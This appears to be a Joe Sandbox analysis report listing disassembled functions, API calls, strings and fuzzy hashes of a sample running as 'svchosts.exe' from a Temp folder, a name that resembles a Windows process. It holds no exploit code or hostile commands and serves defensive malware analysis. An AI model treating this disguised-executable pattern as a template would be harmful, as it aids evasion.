Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 83d625a479e37131fa16f7c0e73a651c7cde28a8602736e6112ee5213d21b79f
Instruction ID: aef15584b3c2afba86777aa0d739339e90dcc365570e6b2f76bcfdc8378d49d5
Opcode Fuzzy Hash: 83d625a479e37131fa16f7c0e73a651c7cde28a8602736e6112ee5213d21b79f
Instruction Fuzzy Hash: 9431F67A91020AEBCB00DFE5D885DEFBBBCFF58300B04445AE955E3210EB30AA55CB64

Function 002A91B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 002A91D4
_memcmp.LIBVCRUNTIME ref: 002A91EB

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 5d0fcc96623c50523d1cf4d9c72670c44d50b28baef05b4270aaba6a4e40dfad
Instruction ID: 580ce3855f81239590d703edc3d62cfcc8bc40bb6357c072128cc2e8015124ba
Opcode Fuzzy Hash: 5d0fcc96623c50523d1cf4d9c72670c44d50b28baef05b4270aaba6a4e40dfad
Instruction Fuzzy Hash: 9521B27162050EBBEB059F11CD81F6B77ADEB93784B108229FC099B201EA74EDE18790

Function 002AD2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 002AD2F2
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002AD30C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002AD31D
TranslateMessage.USER32(?), ref: 002AD327
DispatchMessageW.USER32(?), ref: 002AD331
WaitForSingleObject.KERNEL32(?,0000000A), ref: 002AD33C

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 1253f1688ba6d10eed518cfe899f8a1506cfb979f8fdc0a0ceb853da3d54d2f2
Instruction ID: 77d0b0cfd1b468b4f0d393b58df111e0c8fe9f09ec2ba239f0c077daa5305ca8
Opcode Fuzzy Hash: 1253f1688ba6d10eed518cfe899f8a1506cfb979f8fdc0a0ceb853da3d54d2f2
Instruction Fuzzy Hash: C1F03C72A0111ABBCB209FA1EC4CEEBBF6DEF523A1F008426F606D2010DA359555CBA1

Function 002AC40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 002AC435

Part of subcall function 002A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0029BB05,00000000,.exe,?,?,00000800,?,?,002A85DF,?), ref: 002A17C2

Strings

MAX, xrefs: 002AC487
HIDE, xrefs: 002AC474
<, xrefs: 002AC41E
MIN, xrefs: 002AC4A3

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: CompareString_wcschr
String ID: <$HIDE$MAX$MIN
API String ID: 2548945186-3358265660
Opcode ID: 4287d481fe0c266813211fde8567795342b1a35a6d57e9f6c28d8374dd955127
Instruction ID: 5ea242808020fd60c5581199f75245639dc5ba8e4897da30ea2713065401e6ec
Opcode Fuzzy Hash: 4287d481fe0c266813211fde8567795342b1a35a6d57e9f6c28d8374dd955127
Instruction Fuzzy Hash: DF31857691420DABDF21DE54CC51FEAB7BCEB1A350F104066F905D6091EFB19EE4CA60

Function 002AA990 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 0029130B: GetDlgItem.USER32(00000000,00003021), ref: 0029134F
Part of subcall function 0029130B: SetWindowTextW.USER32(00000000,002C35B4), ref: 00291365

EndDialog.USER32(?,00000001), ref: 002AA9DE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 002AA9F6
SetDlgItemTextW.USER32(?,00000067,?), ref: 002AAA24

Strings

xj., xrefs: 002AAA02
GETPASSWORD1, xrefs: 002AA9A9

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1$xj.
API String ID: 445417207-2247023717
Opcode ID: 42e8264c3283c349a29d221beeb423a1d8f328d8b61c5a810bc339fc5ba90863
Instruction ID: 40438a24292fd12c4d86bd3039c281ed05af80177608f4ab5df1ad8598649a3c
Opcode Fuzzy Hash: 42e8264c3283c349a29d221beeb423a1d8f328d8b61c5a810bc339fc5ba90863
Instruction Fuzzy Hash: E2114C3396021AB7DB219E649E09FF7777CEF0B310F000026FA45F2091CBA09974D662

Function 002AADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 002AADFD
GetObjectW.GDI32(00000000,00000018,?), ref: 002AAE22
DeleteObject.GDI32(00000000), ref: 002AAE54
DeleteObject.GDI32(00000000), ref: 002AAE77

Part of subcall function 002A9E1C: FindResourceW.KERNEL32(002AAE4D,PNG,?,?,?,002AAE4D,00000066), ref: 002A9E2E
Part of subcall function 002A9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,002AAE4D,00000066), ref: 002A9E46
Part of subcall function 002A9E1C: LoadResource.KERNEL32(00000000,?,?,?,002AAE4D,00000066), ref: 002A9E59
Part of subcall function 002A9E1C: LockResource.KERNEL32(00000000,?,?,?,002AAE4D,00000066), ref: 002A9E64

Strings

], xrefs: 002AAE2A

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID: ]
API String ID: 142272564-3352871620
Opcode ID: 11a2cc1e33cb236628129b94e73594f6f5e199aa7fbf5de52a45452987db2052
Instruction ID: f667d1064efba4471d3696a356b6d16d9c62da7c15b3975b54d47eb33e279733
Opcode Fuzzy Hash: 11a2cc1e33cb236628129b94e73594f6f5e199aa7fbf5de52a45452987db2052
Instruction Fuzzy Hash: 63016632551212A7C7103B64AD09A7F7B79AF83B51F080025FD00A7291CF318C38CAB1

Function 002ACC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0029130B: GetDlgItem.USER32(00000000,00003021), ref: 0029134F
Part of subcall function 0029130B: SetWindowTextW.USER32(00000000,002C35B4), ref: 00291365

EndDialog.USER32(?,00000001), ref: 002ACCDB
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 002ACCF1
SetDlgItemTextW.USER32(?,00000066,?), ref: 002ACD05
SetDlgItemTextW.USER32(?,00000068), ref: 002ACD14

Strings

RENAMEDLG, xrefs: 002ACCA8

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: d516386fc67fe69fc66ab72f2dacd05cae69293eeaf03a138239f985708bbcd7
Instruction ID: c2ebc9ccaa1e0ef061889730aeea20e8f2cbbae9507fba544947b5429ec5f595
Opcode Fuzzy Hash: d516386fc67fe69fc66ab72f2dacd05cae69293eeaf03a138239f985708bbcd7
Instruction Fuzzy Hash: BD0128332E4311BBD9114F64AD0CF673B6DEB5B752F300426F34AA60E1CEA15928CB65

Function 002B2503 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 002B251A

Part of subcall function 002B2B52: ___AdjustPointer.LIBCMT ref: 002B2B9C

_UnwindNestedFrames.LIBCMT ref: 002B2531
___FrameUnwindToState.LIBVCRUNTIME ref: 002B2543
CallCatchBlock.LIBVCRUNTIME ref: 002B2567

Strings

/)+, xrefs: 002B2526, 002B2517

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID: /)+
API String ID: 2633735394-615169636
Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction ID: 0f5aef595fff2ce7559cae188b59a70f3f5e5f2f042d892ef69728e37a840856
Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction Fuzzy Hash: 65015732010209FBCF229F55CD01EDA3BBAEF58394F018014F91862121C736E875EFA0

Function 002B75C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,002B7573,00000000,?,002B7513,00000000,002CBAD8,0000000C,002B766A,00000000,00000002), ref: 002B75E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002B75F5
FreeLibrary.KERNEL32(00000000,?,?,?,002B7573,00000000,?,002B7513,00000000,002CBAD8,0000000C,002B766A,00000000,00000002), ref: 002B7618

Strings

mscoree.dll, xrefs: 002B75DB
CorExitProcess, xrefs: 002B75ED

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 07b868cfd96b70b86717fad4c165936dc81fce4db05aa24d0095947eb4900d1b
Instruction ID: 26a595530ece235341c5fe383393fdc0328908dbe304966dfc16f9b658c87189
Opcode Fuzzy Hash: 07b868cfd96b70b86717fad4c165936dc81fce4db05aa24d0095947eb4900d1b
Instruction Fuzzy Hash: FAF08C31A28618BBCB159F94EC0DFDDBBB9EF45751F104168E805A2150DF309E90CA94

Function 0029EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 002A0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002A00A0
Part of subcall function 002A0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0029EB86,Crypt32.dll,00000000,0029EC0A,?,?,0029EBEC,?,?,?), ref: 002A00C2

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0029EB92
GetProcAddress.KERNEL32(002D81C0,CryptUnprotectMemory), ref: 0029EBA2

Strings

CryptUnprotectMemory, xrefs: 0029EB98
Crypt32.dll, xrefs: 0029EB7C
CryptProtectMemory, xrefs: 0029EB8C

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: a0682e9befe94224e2a0594970a3e2b0bf52bc070c7e85e8df296f311027682f
Instruction ID: d54887adfbc30410f1901f539a92320a2206c5e0c77c145d590feecad1211995
Opcode Fuzzy Hash: a0682e9befe94224e2a0594970a3e2b0bf52bc070c7e85e8df296f311027682f
Instruction Fuzzy Hash: F5E04671820742AECF30EF38A858F42BAE46F16708B00CC1DE4D6E3680DAB4D5A48B60

Function 002B7DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002B7E4B
_free.LIBCMT ref: 002B7E6B

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e7df4494882e3ad436fb193b00544fd5657007297256f572970b4d22198365fb
Instruction ID: 0ac593763ec1428f36a9094a52e2314215b090a89a301bc89a50a35beb3ec7d9
Opcode Fuzzy Hash: e7df4494882e3ad436fb193b00544fd5657007297256f572970b4d22198365fb
Instruction Fuzzy Hash: 7F41D132A203049BCB24DF78C881A9EB7B9EF89354F1645A8E515EB341EB30ED11CB80

Function 002BB610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 002BB619
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002BB63C

Part of subcall function 002B8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002BC13D,00000000,?,002B67E2,?,00000008,?,002B89AD,?,?,?), ref: 002B854A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 002BB662
_free.LIBCMT ref: 002BB675
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002BB684

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 0904d970d32380c2cbac4b87e42b4eefc67c55efafacacf596bba9ddd1486043
Instruction ID: d382fa61091e6f1b077745405913d4cb8d1dc839411d3f53d694910adaf93c46
Opcode Fuzzy Hash: 0904d970d32380c2cbac4b87e42b4eefc67c55efafacacf596bba9ddd1486043
Instruction Fuzzy Hash: 3201B172622612BF27225E776C8CCFB6A6DEAC6BE03154229BC04C2510DFE18D1186B0

Function 002A075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 002A0A41: ResetEvent.KERNEL32(?), ref: 002A0A53
Part of subcall function 002A0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 002A0A67

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 002A078F
CloseHandle.KERNEL32(?,?), ref: 002A07A9
DeleteCriticalSection.KERNEL32(?), ref: 002A07C2
CloseHandle.KERNEL32(?), ref: 002A07CE
CloseHandle.KERNEL32(?), ref: 002A07DA

Part of subcall function 002A084E: WaitForSingleObject.KERNEL32(?,000000FF,002A0A78,?), ref: 002A0854
Part of subcall function 002A084E: GetLastError.KERNEL32(?), ref: 002A0860

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: d5a82676ae335cde299206f5fbdb493ad1a0b6fb792a68db5292ee40e18618d7
Instruction ID: b8f1cc5d85dc0b466deafa5ebfd21dc7889e9a1ead5e871456169fb6bba4aa97
Opcode Fuzzy Hash: d5a82676ae335cde299206f5fbdb493ad1a0b6fb792a68db5292ee40e18618d7
Instruction Fuzzy Hash: 80019272450704EFC722DB65EC88FC6BBE9FB4A710F004919F15A42160CB766A54CB90

Function 002BBF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002BBF28

Part of subcall function 002B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?), ref: 002B84F4
Part of subcall function 002B84DE: GetLastError.KERNEL32(?,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?,?), ref: 002B8506

_free.LIBCMT ref: 002BBF3A
_free.LIBCMT ref: 002BBF4C
_free.LIBCMT ref: 002BBF5E
_free.LIBCMT ref: 002BBF70

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b49c65a83929b80de24cf7ff49716ffaadc0797daf2331497a62dd0fe485fbd5
Instruction ID: d3dbfbdd40894f30ff39c777c2947f0ffba43e3fb6ca54762389ca8c7049d25b
Opcode Fuzzy Hash: b49c65a83929b80de24cf7ff49716ffaadc0797daf2331497a62dd0fe485fbd5
Instruction Fuzzy Hash: 45F01272525202AB8A21EF65FE8ACA673EDBA007907654805F04ED7D11DB74FC90CF54

Function 002AAC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002AAC85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002AAC96
IsDialogMessageW.USER32(00010450,?), ref: 002AACAA
TranslateMessage.USER32(?), ref: 002AACB8
DispatchMessageW.USER32(?), ref: 002AACC2

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 215746e5005ecc5adf43f304df831aa550706a6bd8d4afecdbaabb374ded3085
Instruction ID: 905bd01130a8dd811e6c9645a50942e0aebc7d6f76376ff8daf50bc2429bbb3a
Opcode Fuzzy Hash: 215746e5005ecc5adf43f304df831aa550706a6bd8d4afecdbaabb374ded3085
Instruction Fuzzy Hash: 05F01D72D0212AEB9B209FE2EC4CDFB7F6CEE162A1740442AF505D2110EF24D509CBB1

Function 002B76BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\svchosts.exe,00000104), ref: 002B76FD
_free.LIBCMT ref: 002B77C8
_free.LIBCMT ref: 002B77D2

Strings

C:\Users\user\AppData\Local\Temp\svchosts.exe, xrefs: 002B76F4, 002B76FB, 002B772A, 002B7762

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\svchosts.exe
API String ID: 2506810119-1829578515
Opcode ID: 272c827a071b9cee7ab46f07a65395e414b177ab45ee732b1ed5157c249f67ea
Instruction ID: e5fad826d31f3c1648e55408ee20bc5d9d947d18128c167fc2c03dc6122e6feb
Opcode Fuzzy Hash: 272c827a071b9cee7ab46f07a65395e414b177ab45ee732b1ed5157c249f67ea
Instruction Fuzzy Hash: 5E318271A24219EFDB21DF9ADC859EEBBFCEBC4390F144066F50997211DA708E60DB90

